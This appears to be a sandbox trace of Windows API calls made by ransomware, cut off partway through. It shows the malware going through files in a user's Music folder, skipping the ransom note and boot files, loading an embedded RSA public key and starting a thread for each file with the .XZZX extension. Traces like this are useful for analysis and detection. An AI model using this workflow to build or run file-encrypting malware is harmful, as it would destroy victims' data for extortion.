[0113.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0113.840] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0113.840] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.840] lstrcpyW (in: lpString1=0x17cf1c, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0113.840] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.840] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4d8 [0113.840] Sleep (dwMilliseconds=0x96) [0113.994] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0113.995] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2="..") returned 1 [0113.995] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2=".") returned 1 [0113.995] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0113.995] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntldr") returned 0x0 [0113.995] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTLDR") returned 0x0 [0113.995] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0113.995] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0113.995] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0113.995] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0113.995] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0113.995] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0113.995] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0113.995] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0113.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4dc [0113.995] Sleep (dwMilliseconds=0x96) [0114.150] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.150] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2="..") returned 1 [0114.150] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2=".") returned 1 [0114.150] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.150] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntldr") returned 0x0 [0114.151] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTLDR") returned 0x0 [0114.151] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.151] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.151] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.151] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.151] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.151] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.151] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0114.151] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4e0 [0114.151] Sleep (dwMilliseconds=0x96) [0114.307] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.307] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2="..") returned 1 [0114.307] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2=".") returned 1 [0114.307] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.308] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntldr") returned 0x0 [0114.308] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTLDR") returned 0x0 [0114.308] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.308] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.308] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.308] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.308] lstrcpyW (in: lpString1=0x17cf1c, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0114.308] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4e4 [0114.308] Sleep (dwMilliseconds=0x96) [0114.467] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.467] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2="..") returned 1 [0114.467] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2=".") returned 1 [0114.467] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.467] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntldr") returned 0x0 [0114.467] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTLDR") returned 0x0 [0114.467] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.467] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.467] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.467] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.467] lstrcpyW (in: lpString1=0x17cf1c, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0114.468] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4e8 [0114.468] Sleep (dwMilliseconds=0x96) [0114.627] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.627] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.627] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2="..") returned 1 [0114.627] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2=".") returned 1 [0114.628] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.628] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntldr") returned 0x0 [0114.628] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTLDR") returned 0x0 [0114.628] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.628] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.628] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.628] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.628] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.628] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.628] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0114.628] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4ec [0114.628] Sleep (dwMilliseconds=0x96) [0114.774] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.774] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2="..") returned 1 [0114.775] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2=".") returned 1 [0114.775] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.775] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntldr") returned 0x0 [0114.775] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTLDR") returned 0x0 [0114.775] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.775] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.775] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.775] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.775] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.775] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0114.775] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f0 [0114.775] Sleep (dwMilliseconds=0x96) [0114.931] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0114.931] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2="..") returned 1 [0114.931] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2=".") returned 1 [0114.931] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0114.931] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntldr") returned 0x0 [0114.931] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTLDR") returned 0x0 [0114.931] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0114.931] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntdetect.com") returned 0x0 [0114.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0114.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0114.931] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0114.931] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0114.931] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0114.931] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0114.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, 